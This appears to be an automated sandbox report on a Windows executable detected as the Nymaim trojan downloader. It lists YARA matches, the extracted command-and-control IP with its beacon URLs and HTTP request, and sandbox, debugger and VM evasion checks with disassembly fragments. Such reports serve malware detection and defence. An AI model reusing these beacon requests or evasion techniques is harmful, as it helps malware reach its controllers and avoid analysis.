Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565722
MD5: 24fd69187bd9cb0bfbae4c051db9e658
SHA1: 484e593d6f0410027ec108a670a0f2e4b112244a
SHA256: 31dc48b6c89b00fffa7e3377584085558cc79bec167ba7143cc75915696369e7
Tags: exe, user-Bitsight

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 24FD69187BD9CB0BFBAE4C051DB9E658)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Nymaim | Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim
{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source | Rule | Description | Author | Strings
00000000.00000002.4453741215.0000000004790000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x8436:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.2004309647.0000000004A30000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

Source | Rule | Description | Author | Strings
0.2.file.exe.4940e67.1.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
0.3.file.exe.4a30000.0.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
0.2.file.exe.400000.0.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
0.2.file.exe.400000.0.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |

No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubG | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2 | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubH | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubD | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubCon | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubf | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubR | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubE | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub_ | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubb | Avira URL Cloud: Label: malware
Source: 0.3.file.exe.4a30000.0.raw.unpack | Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source: file.exe | ReversingLabs: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004035D0 CryptAcquireContextW, CryptCreateHash, CryptHashData, GetLastError, CryptDeriveKey, GetLastError, CryptReleaseContext, CryptDecrypt, CryptDestroyKey
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04943837 CryptAcquireContextW, CryptCreateHash, CryptHashData, GetLastError, CryptDeriveKey, GetLastError, CryptReleaseContext, CryptDecrypt, CryptDestroyKey
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00417727 FindFirstFileExW
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0495798E FindFirstFileExW

Networking

Source: Malware configuration extractor | IPs: 185.156.72.65
Source: Joe Sandbox View | IP Address: 185.156.72.65
Source: Joe Sandbox View | ASN Name: ITDELUXE-ASRU
Source: unknown | TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401970 HttpAddRequestHeadersA, InternetSetFilePointer, InternetReadFile, HttpQueryInfoA, CoCreateInstance
Source: global traffic | HTTP traffic detected:
    GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 1
    Host: 185.156.72.65
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2
Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubCon
Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubD
Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubE
Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubG
Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubH
Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubR
Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub_
Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubb
Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubf
Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubr

E-Banking Fraud

Source: Yara match | File source: 0.2.file.exe.4940e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.4a30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2004309647.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 00000000.00000002.4453741215.0000000004790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00410940
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041A346
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040EBC7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00403D40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00415E59
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040B6D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402EE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404F70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040EF09
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041572E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D3406
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E44B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D68A4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E8D69
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00473D15
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005C0936
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E1934
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E2920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005745EF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00471E5D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00486E74
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004826C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00527ED4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A9AC3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054BB72
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00569F3C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004863DE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D13D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D83F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DD7E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061D3D3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0494EE2E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04955995
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0494B937
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0494F170
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04950BA7
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0040A7A0 appears 35 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0494AA07 appears 35 times
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.4453741215.0000000004790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe | Static PE information: Section: ZLIB complexity 0.9952312234607219
Source: file.exe | Static PE information: Section: iqkzmigc ZLIB complexity 0.9920429307357712
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402A50 VirtualProtect, GetLastError, FormatMessageA, LocalAlloc, OutputDebugStringA, LocalFree, LocalFree, LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04798464 CreateToolhelp32Snapshot, Module32First
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401970 HttpAddRequestHeadersA, InternetSetFilePointer, InternetReadFile, HttpQueryInfoA, CoCreateInstance
Source: C:\Users\user\Desktop\file.exe | Command line argument: nosub (0_2_004087E0)
Source: C:\Users\user\Desktop\file.exe | Command line argument: mixtwo (0_2_004087E0)
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 34%
Source: file.exe | String found in binary or memory: /add?substr=
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2008064 > 1048576
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe | Static PE information: Raw size of iqkzmigc is bigger than: 0x100000 < 0x1a7e00

Data Obfuscation

                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iqkzmigc:EW;afatghvh:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1f3d28 should be: 0x1f5cd4
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: iqkzmigc
                Source: file.exeStatic PE information: section name: afatghvh
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A237 push ecx; ret | 0_2_0040A24A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00421B7D push esi; ret | 0_2_00421B86
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FB02F push ebx; ret | 0_2_006FB03E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FB004 push edi; ret | 0_2_006FB013
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FB0CD push ecx; ret | 0_2_006FB0DC
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FA95C push edx; ret | 0_2_006FA96B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FB133 push edi; ret | 0_2_006FB142
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FA9FD push esi; ret | 0_2_006FAA0C
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FB1FD push edx; ret | 0_2_006FB20C
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FA9D4 push ebx; ret | 0_2_006FA9E3
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FAA5A push ebx; ret | 0_2_006FAA69
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FAADE push ebx; ret | 0_2_006FAAED
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FB2A3 push eax; ret | 0_2_006FB2C1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FB293 push ebx; ret | 0_2_006FB2A2
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FB372 push ecx; ret | 0_2_006FB381
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FEB53 push eax; mov dword ptr [esp], ebp | 0_2_006FEC70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FB323 push ecx; ret | 0_2_006FB332
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FAB32 push ecx; ret | 0_2_006FAB41
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FAB0A push eax; ret | 0_2_006FAB19
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FEB1E push ecx; mov dword ptr [esp], edx | 0_2_006FEB23
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FEB1E push eax; mov dword ptr [esp], ebp | 0_2_006FEC70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FABFB push ebp; ret | 0_2_006FAC0A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FEBC7 push eax; mov dword ptr [esp], ebp | 0_2_006FEC70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FABC4 push edx; ret | 0_2_006FABD3
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FCBA9 push ebp; mov dword ptr [esp], 2F56353Ah | 0_2_006FCBB4
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FCBA9 push ebx; mov dword ptr [esp], edi | 0_2_006FCBD7
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FCBA9 push 1A5101C1h; mov dword ptr [esp], ebx | 0_2_006FCC22
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FCB82 push ebp; mov dword ptr [esp], 2F56353Ah | 0_2_006FCBB4
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FCB82 push ebx; mov dword ptr [esp], edi | 0_2_006FCBD7
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FCB82 push 1A5101C1h; mov dword ptr [esp], ebx | 0_2_006FCC22
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FB39E push ebx; ret | 0_2_006FB3AD
                Source: file.exe | Static PE information: section name: entropy: 7.941794412700174
                Source: file.exe | Static PE information: section name: iqkzmigc entropy: 7.9499747194883374

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D670 second address: 62D674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F40C second address: 62F412 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F412 second address: 62F440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F99FCCDC7D6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edi 0x00000011 jng 00007F99FCCDC7D6h 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F99FCCDC7E4h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630720 second address: 63072A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99FD381EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63072A second address: 630734 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99FCCDC7DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631A1D second address: 631A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631A23 second address: 631A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F99FCCDC7EAh 0x0000000b jmp 00007F99FCCDC7E4h 0x00000010 popad 0x00000011 nop 0x00000012 mov bl, al 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F99FCCDC7D8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 xor bh, FFFFFFE9h 0x00000033 push 00000000h 0x00000035 mov ebx, 44A34F13h 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631A73 second address: 631A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jns 00007F99FD381EE6h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631A88 second address: 631A9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63396E second address: 633986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EF4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633986 second address: 6339FE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99FCCDC7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F99FCCDC7D8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov bl, ch 0x0000002b mov dword ptr [ebp+12454B32h], edi 0x00000031 push 00000000h 0x00000033 mov bx, 3A01h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F99FCCDC7D8h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 mov ebx, dword ptr [ebp+122D3855h] 0x00000059 xchg eax, esi 0x0000005a jmp 00007F99FCCDC7DFh 0x0000005f push eax 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 push edx 0x00000064 pop edx 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634ACD second address: 634B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F99FD381EE8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov edi, 133E1800h 0x00000028 push 00000000h 0x0000002a xor dword ptr [ebp+122D2F92h], esi 0x00000030 push 00000000h 0x00000032 mov ebx, dword ptr [ebp+122D18B6h] 0x00000038 push eax 0x00000039 jnp 00007F99FD381EF0h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635961 second address: 635967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6378FC second address: 637900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63897C second address: 638985 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
